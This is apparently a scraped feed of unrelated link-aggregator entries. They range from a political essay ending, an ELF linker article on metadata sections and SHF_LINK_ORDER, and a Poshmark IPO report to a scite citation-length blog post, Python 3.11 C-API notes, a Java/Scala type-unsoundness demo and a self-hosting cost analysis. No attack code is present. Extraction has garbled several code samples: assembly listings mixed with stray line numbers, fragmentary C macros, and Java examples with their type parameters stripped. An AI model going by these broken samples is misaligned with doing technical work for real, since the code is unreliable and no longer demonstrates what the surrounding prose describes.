Southern fundamentalist Christian Republicans; in the UK, white rural working-class leave voters. In both cases, their ignorance is treated as worthy of mockery, their religion is treated as stupidity and failure to understand science, their poverty makes them “trailer trash”, their rejection of economic-growth-at-all-costs means they are too stupid to understand the stakes, and their desire to protect their obviously inferior culture makes them xenophobic and racist. I agree with the sentiment . But I think this view has it backwards. Hillbilly society has deep problems, but hillbilly culture is doing fine. (I mean, they got a US President elected.) It is the culture of modern elites, the culture of New York, London and Silicon Valley — modern liberalism, with its silliness and glories — that is under threat. De te fabula narratur ! The story is about you! Part II will try to improve our understanding of what is actually going on. It will unmask the “summoner-eating demon” as an old friend, sketch the rise and fall of Western culture narrowly defined, and explain where we are today and where we might be going. If you liked this content, then I would love you to do three things: Subscribe to this newsletter. It’s free. Share Wyclif’s Dust on social media. By telling your friends and/or followers, you’ll be doing me a huge favour. Read about the book I’m writing. It’s called Wyclif’s Dust , too. You can download a sample chapter.
2
Inferno: Dust Explosion at Imperial Sugar (2009) [video]
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
1
Metadata Sections, Comdat and Shf_link_order
Many compiler options intrument or annotate text sections, and need to create a metadata section for every candidate text section. Such metadata sections have the following property: In many applications a metadata section does not need other auxiliary sections. Without inlining (discussed in detail later), many sections additionally have this following property: .section .text.foo,"ax",@progbits .section .meta.foo,"a",@progbits .quad .text.foo-. # PC-relative relocation Non-SHF_ALLOC metadata sections need to use absolute relocation types. There is no program counter concept for a section not loaded into memory, so PC-relative relocations cannot be used. # Without 'w', text relocation. .section .meta.foo,"",@progbits .quad .text.foo # link-time constant # Absolute relocation types have different treatment in SHF_ALLOC and non-SHF_ALLOC sections. For SHF_ALLOC sections, PC-relative relocations are recommended. If absolute relocations (with the width equaling the word size) are used, R_*_RELATIVE dynamic relocations will be produced and the section needs to be writable. 1 2 3 4 5 6 .section .meta.foo,"a",@progbits .quad .text.foo-. # link-time constant # Without 'w', text relocation. .section .meta.foo,"aw",@progbits .quad .text.foo # R_*_RELATIVE dynamic relocation if -pie or -shared The runtime usually needs to access all the metadata sections. Metadata section names typically consist of pure C-like identifier characters (isalnum characters in the C locale plus _) to leverage a linker magic. Let's use the section name meta as an example. __start_meta and __stop_meta are sometimed called encapsulation symbols. Note: C11 7.1.3 [Reserved identifiers] says All identifiers that begin with an underscore and either an uppercase letter or another underscore are always reserved for any use. No other identifiers are reserved. If the program declares or defines an identifier in a context in which it is reserved (other than as allowed by 7.1.4), or defines a reserved identifier as a macro name, the behavior is undefined. Clang -Wreserved-identifier warns for the usage. That said, compilers don't punish you for the undefined behavior. Users want GC for metadata sections: if .text.foo is retained, meta (for .text.foo) is retained; if .text.foo is discarded, meta is discarded. There are three use cases: The first case is undesired, because the metadata section is unnecessarily retained. The second case has a more serious correctness issue. To make the two cases work, we can place .text.foo and meta in a section group. If .text.foo is already in a COMDAT group, we can place meta into the same group; otherwise we can create a non-COMDAT section group (LLVM>=13.0.0, comdat noduplicates support for ELF). 1 2 3 4 5 6 7 8 9 # Zero flag section group .section .text.foo,"aG",@progbits,foo .section .meta.foo,"a?",@progbits # GRP_COMDAT section group, common with C++ inline functions and template instantiations .section .text.foo,"aG",@progbits,foo,comdat .section .meta.foo,"a?",@progbits A section group requires an extra section header (usually named .group), which requires 40 bytes on ELFCLASS32 platforms and 64 bytes on ELFCLASS64 platforms. The size overhead is concerning in many applications, so people were looking for better representations. (AArch64 and x86-64 define ILP32 ABIs and use ELFCLASS32, but technically they can use ELFCLASS32 for small code model with regular ABIs, if the kernel allows.) Another approach is SHF_LINK_ORDER. There are separate chapters introducing section groups (COMDAT) and SHF_LINK_ORDER in this article. Let's discuss the third case in detail. We have these conditions: Since the runtime uses __start_/__stop_, __start_/__stop_ references are present in a live section. Now let's introduce the unfortunate special rule about __start_/__stop_: 1 2 3 4 5 6 7 8 9 leaq __start_meta(%rip), %rdi leaq __stop_meta(%rip), %rsi a.o:(meta) and b.o:(meta) are not referenced via regular relocations. Nevertheless, they are retained by the __start_meta reference. (The __stop_meta reference can retain the sections as well.) Now, it is natural to ask: how can we make GC for meta? In ld.lld<=12, the user can set the SHF_LINK_ORDER flag, because the rule is refined: __start_/__stop_ references from a live input section retains all non-SHF_LINK_ORDER C identifier name sections. (Example SHF_LINK_ORDER C identifier name sections: __patchable_function_entries (-fpatchable-function-entry), __sancov_guards (clang -fsanitize-coverage=trace-pc-guard, before clang 13)) In ld.lld>=13, the user can also use a section group, because the rule is further refined: __start_/__stop_ references from a live input section retains all non-SHF_LINK_ORDER non-SHF_GROUP C identifier name sections. GNU ld does not implement the refinement (PR27259). A section group has size overhead, so SHF_LINK_ORDER may be attempting. However, it ceases to be a solution when inlining happens. Let's walk through an example demonstrating the problem. Our first design uses a plain meta for each text section. We use ,unique to keep separate sections, otherwise the assembler would combine meta into a monolithic section. 1 2 3 4 5 6 7 8 9 leaq __start_meta(%rip), %rdi leaq __stop_meta(%rip), %rsi .section .text.foo,"ax",@progbits leaq .Lmeta.foo(%rip), %rax .section .text.bar,"ax",@progbits leaq .Lmeta.bar(%rip), %rax .section meta,"a",@progbits,unique,0 .section meta,"a",@progbits,unique,1 The __start_meta/__stop_meta references retain meta sections, so we add the SHF_LINK_ORDER flag to defeat the rule. Note: we can omit ,unique because sections with different linked-to sections are not combined by the assembler. 1 2 3 4 5 6 7 .section meta,"ao",@progbits,foo .section meta,"ao",@progbits,bar This works as long as inlining is not concerned. However, in many instrumentations, the metadata references are created before inlining. With LTO, if the instrumentation is preformed before LTO, inlining can naturally happen after instrumentation. If foo is inlined into bar, the meta for .text.foo may get a reference from another text section .text.bar, breaking an implicit assumption of SHF_LINK_ORDER: a SHF_LINK_ORDER section can only be referenced by its linked-to section. 1 2 3 4 5 6 7 8 9 # Both .text.foo and .text.bar reference meta. .section .text.foo,"ax",@progbits leaq .Lmeta.foo(%rip), %rax .section .text.bar,"ax",@progbits leaq .Lmeta.foo(%rip), %rax leaq .Lmeta.bar(%rip), %rax Remember that _start calls bar but not foo, .text.bar (caller) will be retained while .text.foo (callee) will be discarded. The meta for foo will link to the discarded .text.foo. This will be recjected by linkers. ld.lld will report: {{.*}}:(meta): sh_link points to discarded section {{.*}}:(.text.foo). Here is the history behind the GNU ld rule. ld.lld had dropped the behavior for a while until r294592 restored it. ld.lld refined the rule by excluding SHF_LINK_ORDER. I am with Alan Modra in a 2010 comment: I think this is a glibc bug. There isn't any good reason why a reference to a __start_section/__stop_section symbol in an output section should affect garbage collection of input sections, except of course that it works around this glibc --gc-sections problem. I can imagine other situations where a user has a reference to __start_section but wants the current linker behaviour. Anyhow, GNU ld installed a workaround and made it apply to all C identifier name sections, not just the glibc sections. Making each meta part of a zero flag section group can address this problem, but why do we need a section group to work around a problem which should not exist? I added -z start-stop-gc to ld.lld so that we can drop the rule entirely (D96914). In PR27451, Alan Modra and I implemented ld.bfd -z start-stop-gc. Due to PR27491, in a -shared link, __start_meta undefined weak references may get spurious relocation R_X86_64_PC32 against undefined protected symbol `__start_meta' can not be used when making a shared object if all meta sections are discarded. You may see this: error: undefined symbol: __start_meta (ld.lld) or undefined reference to `__start_meta' (GNU ld). One approach is to use undefined weak symbols: __attribute__((weak)) __start_meta[], __stop_meta[]; Another is to ensure there is at least one live metadata section, by creating an empty section in the runtime. In binutils 2.36, GNU as introduced the flag R to represent SHF_GNU_RETAIN on FreeBSD and Linux emulations. I have added the support to LLVM integrated assembler and allowed the syntax on all ELF platforms. .section meta,"aR",@progbits With GCC>=11 or Clang>=13 (https://reviews.llvm.org/D97447), you can write: 1 2 3 4 5 __attribute__((retain,used,section())) 0 In a macro, you may use: 1 2 3 4 5 6 7 8 9 ) p) ) `-Wattributes` ignores warnings older compilers. The `used` attribute, when attached to a function variable definition, indicates that there may be references to the entity which are apparent in the source code. On COFF and Mach-O targets (Windows and Apple platforms), the `used` attribute prevents symbols from being removed by linker section GC. On ELF targets, GNU ld/gold/ld.lld may remove the definition it is otherwise referenced. The `retain` attributed was introduced in GCC to the `SHF_GNU_RETAIN` flag on ELF targets. GCC has an open issue that `__has_attribute(retain)` returning does guarantee `SHF_GNU_RETAIN` 1 p (".pushsection .init_array,\"aw\",@init_array\n" p ) This idea is that SHT_INIT_ARRAY sections are GC roots. An empty SHT_INIT_ARRAY does not change the output. The artificial reference keeps meta live. I added .reloc support for R_ARM_NONE/R_AARCH64_NONE/R_386_NONE/R_X86_64_NONE/R_PPC_NONE/R_PPC64_NONE in LLVM 9.0.0. See COMDAT and section group. In a generic-abi thread, Cary Coutant initially suggested to use a new section flag SHF_ASSOCIATED. HP-UX and Solaris folks objected to a new generic flag. Cary Coutant then discussed with Jim Dehnert and noticed that the existing (rare) flag SHF_LINK_ORDER has semantics closer to the metadata GC semantics, so he intended to replace the existing flag SHF_LINK_ORDER. Solaris had used its own SHF_ORDERED extension before it migrated to the ELF simplification SHF_LINK_ORDER. Solaris is still using SHF_LINK_ORDER so the flag cannot be repurposed. People discussed whether SHF_OS_NONCONFORMING could be repurposed but did not take that route: the platform already knows whether a flag is unknown and knowing a flag is non-conforming does not help produce better output. In the end the agreement was that SHF_LINK_ORDER gained additional metadata GC semantics. This flag adds special ordering requirements for link editors. The requirements apply to the referenced section identified by the sh_link field of this section's header. If this section is combined with other sections in the output file, the section must appear in the same relative order with respect to those sections, as the referenced section appears with respect to sections the referenced section is combined with. A typical use of this flag is to build a table that references text or data sections in address order. In addition to adding ordering requirements, SHF_LINK_ORDER indicates that the section contains metadata describing the referenced section. When performing unused section elimination, the link editor should ensure that both the section and the referenced section are retained or discarded together. Furthermore, relocations from this section into the referenced section should not be taken as evidence that the referenced section should be retained. Actually, ARM EHABI has been using SHF_LINK_ORDER for index table sections .ARM.exidx*. A .ARM.exidx section contains a sequence of 2-word pairs. The first word is 31-bit PC-relative offset to the start of the region. The idea is that if the entries are ordered by the start address, the end address of an entry is implicitly the start address of the next entry and does not need to be explicitly encoded. For this reason the section uses SHF_LINK_ORDER for the ordering requirement. The GC semantics are very similar to the metadata sections'. So the updated SHF_LINK_ORDER wording can be seen as recognition for the current practice (even though the original discussion did not actually notice ARM EHABI). In GNU as, before version 2.35, SHF_LINK_ORDER could be produced by ARM assembly directives, but not specified by user-customized sections. If an output section consists of only non-SHF_LINK_ORDER sections, the rule is clear: input sections are ordered in their input order. If an output section consists of only SHF_LINK_ORDER sections, the rule is also clear: input sections are ordered with respect to their linked-to sections. What is unclear is how to handle an output section with mixed unordered and ordered sections. Now, in a non-relocatable link, SHF_LINK_ORDER sections are ordered before non-SHF_LINK_ORDER sections in an output section (https://sourceware.org/bugzilla/show_bug.cgi?id=26256, D77007). Before, the lld diagnostic error: incompatible section flags for .rodata and GNU ld's diagnostic caused a problem if the user wanted to place such input sections along with unordered sections, e.g. .init.data : { ... KEEP(*(__patchable_function_entries)) ... } (https://github.com/ClangBuiltLinux/linux/issues/953). Mixed unordered and ordered sections within an input section description was still a problem. This made it infeasible to add SHF_LINK_ORDER to an existing metadata section and expect new object files linkable with old object files which do not have the flag. I asked how to resolve this upgrade issue and Ali Bahrami responded: The Solaris linker puts sections without SHF_LINK_ORDER at the end of the output section, in first-in-first-out order, and I don't believe that's considered to be an error. So I went ahead and implemented a similar rule for ld.lld: D84001 allows arbitrary mix and places SHF_LINK_ORDER sections before non-SHF_LINK_ORDER sections. We decided that the integrated assembler allows SHF_LINK_ORDER with sh_link=0 and ld.lld can handle such sections as regular unordered sections (https://reviews.llvm.org/D72904). You will see error: ... sh_link points to discarded section .... A SHF_LINK_ORDER section has an assumption: it can only be referenced by its linked-to section. Inlining and the discussed __start_ rule can break this assumption. A function section has a metadata section. No inlining. SHF_LINK_ORDER is the perfect solution. A section group can be used, but that just adds size overhead. A function needs __llvm_prf_cnts, __llvm_prf_data and in some cases __llvm_prf_vals. Inlining may happen. A function references its __llvm_prf_cnts and may reference its __llvm_prf_data if value profiling applies. The __llvm_prf_data references the text section, the associated __llvm_prf_cnts and the associated __llvm_prf_vals. Because the __llvm_prf_cnts and the __llvm_prf_data may be referenced by more than one text section, SHF_LINK_ORDER is not a solution. We need to place the __llvm_prf_cnts, the __llvm_prf_data and (if present) the __llvm_prf_vals in one section group so that they will be retained or discarded as a unit. If the text section is already in a COMDAT group, we can reuse the group; otherwise we need to create a zero flag section group and optionally place the text section into the group. LLVM from 13.0.0 onwards will use a zero flag section group. Note: due to the __start_ reference rule and the fact that the __llvm_prf_data references the text section, with GNU ld and gold all instrumented text sections cannot be discarded. There can be a huge size bloat. If you use GNU ld>=2.37, you can try -z start-stop-gc. For Windows, the cnts section is named .lprfc$M and the data section is named .lprfd$M. The garbage collection story is unfortunate. If an IMAGE_COMDAT_SELECT_ASSOCIATIVE section defines an external symbol, MSVC link.exe may report a spurious duplicate symbol error (error LNK2005), even if the associative section would be discarded after handling the leader symbol. lld-link doesn't have this limitation. However, a portable implementation needs to work around MSVC link.exe. For a COMDAT .lprfd$M, its symbol must be external (linkonce_odr), otherwise references to a non-prevailing symbol would cause an error. Due to the limitation, .lprfd$M has to reside in its own COMDAT, no sharing with .lprfc$M. Different COMDAT groups mean that the liveness of one .lprfc$M does not make its associative .lprfd$M live. Since a .lprfd$M may be unreferenced, we have to conservatively assume all COMDAT .lprfd$M live. Since .lprfc$M input sections parallel .lprfd$M input sections, we have to conservatively assume all COMDAT .lprfc$M live. For an external symbol, we use a /INCLUDE: directive in .drectve to mark it as a GC root. As a result, .drectve may have many /INCLUDE: directives, just to work around the link.exe limitation. Note: for ELF we can use R_*_NONE to establish an artificial dependency edge between two sections. I don't think PE-COFF provides a similar feature. clang -fexperimental-sanitize-metadata=atomics instruments functions and creates !pcsections metadata for functions and atomic instructions. The address of an instrumented atomic instruction is recorded in a section named sanmd_atomics. The sanmd_atomics section has the SHF_LINK_ORDER flag and links to the text section. Arm Compiler 5 splits up DWARF Version 3 debug information and puts these sections into comdat groups. On "monolithic input section handling", Peter Smith commented that: We found that splitting up the debug into fragments works well as it permits the linker to ensure that all the references to local symbols are to sections within the same group, this makes it easy for the linker to remove all the debug when the group isn't selected. This approach did produce significantly more debug information than gcc did. For small microcontroller projects this wasn't a problem. For larger feature phone problems we had to put a lot of work into keeping the linker's memory usage down as many of our customers at the time were using 32-bit Windows machines with a default maximum virtual memory of 2Gb. COMDAT sections have size overhead on extra section headers. Developers may be tempted to decrease the overhead with SHF_LINK_ORDER. However, the approach does not work due to the ordering requirement. Considering the following fragments: 1 2 3 4 5 6 7 8 9 - DW_TAG_compile_unit [a.o common] -- DW_TAG_variable [a.o .data.foo] -- DW_TAG_namespace [common] --- DW_TAG_subprogram [a.o .text.bar] --- DW_TAG_variable [a.o .data.baz] - DW_TAG_compile_unit [b.o common] -- DW_TAG_variable [b.o .data.foo] -- DW_TAG_namespace [common] --- DW_TAG_subprogram [b.o .text.bar] --- DW_TAG_variable [b.o .data.baz] DW_TAG_* tags associated with concrete sections can be represented with SHF_LINK_ORDER sections. After linking the sections will be ordered before the common parts. On Mach-O, ld64 define section$start$__DATA$__data and section$end$__DATA$__data which are similar to __start_/__stop_. ld64's behavior is similar to ld.lld -z start-stop-gc.
1
Poshmark files S-1 to go public
Skip Navigation Poshmark is an online marketplace for secondhand clothing, shoes and accessories. The company filed to go public on Thursday. Poshmark has reported a profit in the past two quarters after consistently turning net losses. Rafael Henrique | LightRocket | Getty Images Online clothing reseller Poshmark filed its IPO prospectus on Thursday, after racking up over $30 million in profit over the past two quarters. Poshmark, founded in 2011, is an internet marketplace for second-hand clothing, shoes and accessories. Like eBay , Poshmark connects buyers with sellers, who often list items from their own closet. The company makes money by taking a cut of each transaction. Poshmark's filing is landing in investors' laps after last week's IPOs of DoorDash and Airbnb, which are also marketplace businesses, resulted in huge first-day pops, potentially indicating public market appetite for the business model. Discount online retailer Wish followed with its IPO this week, though its stock price fell out of the gate. Revenue at Poshmark increased 28% in the first three quarters of 2020 to $192.8 million from $150.5 million the same period last year. It swung to a profit of $20.9 million over that stretch, after losing $33.9 million a year ago. Gross merchandise volume, a key metric measuring total dollar value of merchandise sold online, was negatively impacted in the first quarter because of the coronavirus pandemic. It increased just 9% in the first three months of the year, but rebounded to 42% growth in the second quarter as buyer and seller activity resumed. The company also cited its growing base of active buyers, which doubled in June from two years ago. Like many online retailers, Poshmark said it's benefited from a flood of demand generated by the coronavirus, as local governments ordered people to stay indoors and retail stores closed. The marketplace has also served as a source of additional income for Poshmark's 4.5 million sellers, the company added. However, Poshmark said that Covid-19 remains a risk because of the economic impact on consumers and uncertainty about the stability of the broader economy. "Responses to the COVID-19 pandemic such as prolonged work-from-home policies, quarantines, closures, and travel restrictions could continue to depress demand for the products sold on our platform," the company said in the prospectus. The filing provides the first look into Poshmark's financials after the company confidentially filed to go public in September. It plans to list on the Nasdaq under the symbol "POSH." Poshmark said it now counts 6.2 million active buyers and 31.7 million active users, the majority of which are female and are either millennials or Gen Z. It lists Amazon , eBay , Etsy , Facebook , Shopify , TJ Maxx and Walmart among its competitors. Morgan Stanley and Goldman Sachs are leading the offering. WATCH: Highly-anticipated tech IPOs in 2021 include Instacart and Poshmark watch now
1
Why social media regulation is cursed by Net Neutrality
Opinion To Regulate Social Media, Forget Net Neutrality Photo: Illustration by Jeremie Claeys The conservative Federalist Society’s virtual national convention recently hosted a panel on “Regulating Social Media” featuring a prominent cast of government officials and outside experts. I tuned in, expecting a robust discussion on privacy, data portability, algorithmic bias and content moderation. It was a disappointment. They spent most of the time relitigating the merger between Sprint and T-Mobile and the net neutrality debate around broadband internet service providers. Join now to read the full story The Weekend p ai Live from SF, It’s Tech Week Hi, welcome to your Weekend.It was the boom-iest of times, it was the doom-iest of times. At least that’s how it feels right now in Dickensian San Francisco, where AI companies are setting up shop on every avenue, while fentanyl dealers are hanging out in every alley. I joke—but seriously, it’s wild out here. No fewer than 17 of the 35 startups listed on The Information’s new Generative AI... p p p Recent Popular Stories Exclusive p crypto p In November 2021, just as crypto prices were hitting all-time highs, MoonPay—a crypto payments startup that celebrities including Jimmy Fallon and Paris Hilton had praised for its non-fungible token “concierge” service— announced it had completed its first ever outside fundraising: an eye-popping $555 million round at a $3.4 billion valuation from investors including Tiger Global Management and Coatue Management. p ai p Nvidia’s business of selling chips for artificial intelligence is going gangbusters, but the company faces a looming problem. Exclusive p Finance p Grocery upstarts Instacart and Gopuff haven’t been able to deliver two things at once this year: growth and profits. Exclusive p ar/vr p If Apple unveils its long-awaited mixed-reality headset next week as expected, it will represent the company’s riskiest gamble on a new product since the iPhone. Opinion p p The technology hype cycle would have us believe that the metaverse—so recently the darling of digital trendsetters—is on the decline, its place usurped by generative artificial intelligence. The Electric p p For much of the last century, metals companies have made stainless steel from nickel mined in Russia or the Philippines and smelted at temperatures up to 2,900 degrees.
1
Characteristics of Scite Citation Statements
/ Tue Jan 25 2022 Share This post describes some simple summary statistics on the length of scite citation statements and an overview of what we mean when we say citation statements. Notable findings are that the average citation length is 472 characters but they have quite a high variance (191 characters at the first standard deviation); supporting and contrasting citation statements tend to have a bit less variance (with 176 and 168 characters respectively for their first standard deviation) suggesting they are a bit more formulaic; and citations in the introduction sections tend to be longer (500 characters) and citations in the methods section tend to be shorter (420 characters) which is an intuitive finding of what we would expect in those sections. In order to help you picture what 472 characters looks like see Figure 1 and keep in mind that a maximum tweet length is 280 characters. Much of what scite is built on is what we call citation statements. These have been called citances, in-text citations, citation contexts, and other things by scholars of scientific literature and typically indicate some span of text surrounding a citation made inside of a scholarly document. For example the sentence, "This supports the results presented in Gorman et. al. (2020).", is what is typically indicated by those terms. Extracting these citation statements allows us to classify them to present text spans that users can read in order to understand what is being said about cited papers. However, simply presenting one sentence that captures the citation isn't enough. This is clear from the example presented above. Which results are "the results in Gorman"? What is "this" in "this supports"? And more questions. Because single sentence citation statements are not clear enough on their own we typically capture the sentence before and after the sentence in which the citation appears in order to give users a fuller understanding of why the work is being cited and better reading experience. For more information on how we do this see our manuscript Nicholson et. al. (2021) outlining our methods. Given those citation statements, some have been interested in how long they are. Are they long enough to give enough context about an author's motivation behind citing? How do they differ across citation types (are supporting citations longer than contrasting ones?) or citation section (are introduction citation statements longer than methods citation statements?). In the below analysis we will look at these questions to help you get a better understanding of scite Citation Statements. If you are interested in the characteristics of in-text citations in general Boyack et. al. (2017) is a good resource to look at. At the time of writing (January 25th 2022), scite has over 968m citation statements which have been extracted from over 28m full-text articles. In order to look at the characteristics of those citation statements in an easy to characterize way, we simply count the number of characters in each citation statement. Over a corpus of almost 1bn citation statements this is much easier than tokenizing the statements and counting by number of words.. See Figure 1 below for what a typical citation statement looks like. After counting the citation statements characters we look at the average, standard deviation, minimum, maximum, and number of citations for the following groups of citations: all citations, citations by type (supporting, mentioning, contrasting), and citations by section (introduction, methods, results, discussion). See Table 1 below for a presentation of those summary statistics. The incidence of hypotension in the ropivacaine only group in our study (53.3%) was higher than that reported by McNamee et al 17 with a similar dose of isobaric ropivacaine 0.75% (18.75 mg). This may be because the volume of drug that was administered in our study was 3.0 ml compared to 2.5 ml in the study by McNamee et al. However, the addition of dexemdetomidine did not alter the hemodynamic profile of ropivacaine. Figure 1: Typical citation statement (472 characters, a contrasting citation from a discussion section) Table 1: Summary statistics of character counts of citation statements by various groups. For context the maximum tweet length is 280 characters. Given Table 1 above, it is interesting to note a few things. First the average citation length across groups is 472 characters as in Figure 1. In Figure 1, a contrasting citation from the discussion section, you can see three sentences with the first presenting the difference of results [incidence of hypotension in the ropivacaine only group… higher than… McNamee et al], the second qualifying the difference in method [3.0 ml compared to 2.5 ml in the study by McNamee et al] and the third sentence further justifying conclusions. The typical 472 character length citation statement then seems to provide evidence that the citation statements that we show in scite provide a clearer and more contextualized reading experience than simply the sentence in which the citation is made (In Figure 1, the citing sentence is only 197 characters). However, in Table 1, we also see that the variance on character lengths are naturally quite high. The first standard deviation is 191 characters meaning that 68% of citation statements could be 472 +/- 191 characters. This seems intuitive because the natural variation in sentence lengths is quite high. We should qualify this variance though, since citing sentences that are at the beginning of a paragraph will naturally not have a preceding sentence and citing sentences at the end will not have a proceeding one, part of the variance will simply be capturing the uninformative difference between where the target sentences occur in a paragraph. It is also interesting to look at how citation lengths differ by group. Some groups are not notably different in average length but are slightly less variant. In citation type we see that contrasting citations only have 168 characters at the first standard deviation and supporting citations have only 176 characters at the first standard deviation. While this is a small difference when compared to the variance of 191 characters, this might indicate that supporting and contrasting citations tend to be a bit more formulaic in how they are written. Within citations by section we actually see something quite intuitive. Citations in the introduction section tend to be longer at 500 average characters per citation and method citations tend to be shorter at 420 average characters per citation. This is intuitive because we would expect introduction sections to have long discussions about background work and method citations to be concise descriptions of method due to saving elaboration and longer discussions for later sections. This analysis has just been an initial peek into what scite citation statements tend to look like in aggregate. Further work could use scite citation statements as a vehicle for studying the language of citation statements including things such as lexical diversity (how diverse is the vocabulary being used by the citation statements and how that might differ for vocabularies in papers in general), disciplinary differences across subjects and fields, the degree of unresolved and ambiguous pronouns and references in citation statements, and general differences in the languages used in citation statements versus other language sets like the paper as a whole. If you are interested in doing research on citation statements themselves please let us know at hi@scite.ai as we would love to help you use the scite citation statement corpus for your studies. Boyack, K. W., van Eck, N. J., Colavizza, G., & Waltman, L. (2018). Characterizing in-text citations in scientific articles: A large-scale analysis. Journal of Informetrics, 12(1), 59-73. Nicholson, J. M., Mordaunt, M., Lopez, P., Uppala, A., Rosati, D., Rodrigues, N. P., Grabitz, P., & Rife, S. C. (2021). scite: A smart citation index that displays the context of citations and classifies their intent using deep learning. Quantitative Science Studies, 2(3), 882-898. https://doi.org/10.1162/qss_a_00146
1
Digitalogy: Hire pre-screened and vetted developers, risk free
A COMPREHENSIVE SOLUTION Imagine, 10000+ developers lining up to work with you. We’ll match you with the most compatible hire and will handle all the managerial logistics. VETTING All of our freelancers come to you pre-screened and ready to work. With a screening process that only accepts the top 5% of applicants, you really are getting the cream of the crop. DEDICATED MANAGER Digitalogy will provide a manager to oversee your developer selection process and facilitate the hiring process. We’ll provide you with the developer whose skills best fit the needs of your company and product. REMOTE Developers will complete their work remotely and submit their finished work at designated timelines. You will be in constant communication with them as the project unfolds. QUICK TO HIRE Our network of pros reduces the lag time you experience when searching for viable candidates on your own. We make it easy for you by eliminating all the guesswork! TRIAL Hire devs for a small or dummy project to see if they are a good fit for a long-term project. MATCHING As our network grows, Digitalogy will learn their talents and personalities, allowing us to match the right developers for your project.
1
What’s New In Python 3.11 – Python 3.11.0a0 documentation
The PyFrameObject structure members have been removed from the public C API. While the documentation notes that the PyFrameObject fields are subject to change at any time, they have been stable for a long time and were used in several popular extensions. In Python 3.11, the frame struct was reorganized to allow performance optimizations. Some fields were removed entirely, as they were details of the old implementation. PyFrameObject fields: The Python frame object is now created lazily. A side effect is that the f_back member must not be accessed directly, since its value is now also computed lazily. The PyFrame_GetBack() function must be called instead. Debuggers that accessed the f_locals directly must call PyFrame_GetLocals() instead. They no longer need to call PyFrame_FastToLocalsWithError() or PyFrame_LocalsToFast() , in fact they should not call those functions. The necessary updating of the frame is now managed by the virtual machine. Code defining PyFrame_GetCode() on Python 3.8 and older: #if PY_VERSION_HEX < 0x030900B1 static inline PyCodeObject * PyFrame_GetCode ( PyFrameObject * frame ) { Py_INCREF ( frame -> f_code ); return frame -> f_code ; } #endif Code defining PyFrame_GetBack() on Python 3.8 and older: #if PY_VERSION_HEX < 0x030900B1 static inline PyFrameObject * PyFrame_GetBack ( PyFrameObject * frame ) { Py_XINCREF ( frame -> f_back ); return frame -> f_back ; } #endif Or use the pythoncapi_compat project to get these two functions on older Python versions.
15
The Unsound Playground (2016)
OOPSLA '16Distinguished Artifact Award We, Nada Amin and Ross Tate, broke the Java and Scala type systems! Try it out for yourself by running the examples, which throw cast exceptions even though they contain no casts ↓ Read our paper to learn how these examples work → Come up with your own examples and use the save icon to update the URL to a permalink to your code ↱ Which language would you like to break? Java / Scala class Unsound { static class Constrain {} static class Bind { A upcast(Constrain constrain, B b) { return b; } } static U coerce(T t) { Constrain constrain = null; Bind bind = new Bind(); return bind.upcast(constrain, t); } public static void main(String[] args) { String zero = Unsound.coerce(0); }} {} static class Bind { A upcast(Constrain constrain, B b) { return b; } } static U coerce(T t) { Constrain constrain = null; Bind bind = new Bind(); return bind.upcast(constrain, t); } public static void main(String[] args) { String zero = Unsound.coerce(0); }} #!/bin/bashset -e -v### PICK VERSIONexport JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64export PATH=$JAVA_HOME/bin:$PATH### CHECK VERSIONjava -version### COMPILEcat $1 >Unsound.javajavac Unsound.java### RUNjava Unsound
4
A Modern Terminal Emulator
{{ message }} contour-terminal/contour You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
382
Self-Hosting Still Pays
Years ago, we had a big decision to make. In 2013, STH had grown to a size that would seem immeasurably small by the traffic we do today. Still, at that point, we made the decision that it made fiscal sense to leave Amazon AWS for colocation. We chronicled the reasoning in Falling From the Sky Why STH is Leaving the Cloud and then the cost breakdown in Falling From the Sky Part 3 – Evaluating Amazon EC2, VPS, Dedicated and Colocation Options. Since 2013, we have been doing some irregular updates that largely correspond to planned upgrades of our infrastructure. Since we are taking a look at a few upgrades again, it is time to go through the exercise again. If you want to hear this instead of just reading, we have a YouTube video with some commentary here: Of course, we can go into a bit more detail below, but some prefer to listen rather than read so we have that option. In 2018, we looked again at whether it was time to move back to the cloud. In our cost analysis, this is what we found using 1-year estimates: Just to give some sense of how that March 2018 estimate has gone in the 32 months since we looked at this, we ended up using: Overall, it looks like we probably over-estimated self-hosting costs again, and underestimated AWS costs with respect to how much we would spend there, even after service discounts. We wanted to answer the question of what the picture would look like for hosting STH now. A few quick words before we get there on assumptions. First off, we completely could change the way we run the site. That is a given. Frankly, running in VMs whether on the cloud or in self-hosting is convenient. Indeed, we run containers in VMs as well. We could also overhaul the entire software stack again, but frankly, we want to spend more time creating content then doing that work. Something that we learned was that we had less reliability by increasing complexity than by keeping things as simple as possible. Second, we are modeling current data transfer, and a minimal set of VMs. We actually have a lot more running, including some services that we run for some of the labs. One could argue that since they are lab services they are part of bringing you STH, but they are not focused on the web hosting aspect so we are going to remove them. Also, we have other VMs that are likely only online because we wanted to try something and had capacity. We may or may not elect to run the VMs if there was the AWS incremental cost. We could model these as on-demand or spot instances, but instead, we are just removing them entirely. Third, we completely understand spot pricing. We are modeling a basic set instead of adding extras. At some point, we need databases, nginx servers, and so forth. Fourth, we are going to add a mix of AMD EPYC and Intel Xeon instances roughly about what we use for our hosting. We are heavily weighting the larger instances toward the EPYC instances since that helps bring down the costs and for our workloads, there is no appreciable difference. We could go Arm, but that requires some small lift and shift work. Finally, we do use some AWS services. Those services we would use regardless so we are excluding them from the analysis. We are also not modeling services such as Mailchimp which handles our weekly newsletter, Teespring that handles our online merch shop, YouTube which hosts our videos, and so forth. Here is the calculator for the absolute base setup for our hosting using 1-year reserved upfront instances: As you can see, our hosting costs are just under $4,300 per month. Swapping to 1-year reserved partial up-front on the instances helps bring pricing down a bit albeit with a $19,512 up-front cost. When we factor in the up-front we get a $4,137.63 monthly cost along with a $49,651.56 total annual cost for the year. We are not discounting here using future values/ present values. There is a big issue with this. Typically, we tend to see our servers run for years. To model that, we tend to use 3-year reserved partial upfront. Using the 3-year reserved partial upfront on the instances gives us a much lower operating cost with a larger up-front payment. First off, the $39,020 is more than we have spent in the last three years on hosting hardware. We do not purchase machines with long warranties or high markups, so if you are buying the average Dell/ HPE/ Lenovo server and think that sounds like a single server, you are trading higher upfront costs for service contracts. Given what we have seen on hardware/ remote hands, it is not a model we are pursuing. On the operating side, we get down to $1,968.51 per month which is great. Next year, we will likely do two small changes. First, we will upgrade database nodes and instead of using Optane SSDs, we will move to Cascade Lake and Optane PMem DIMMs into the database servers and upgrade a few older nodes to AMD EPYC 7002 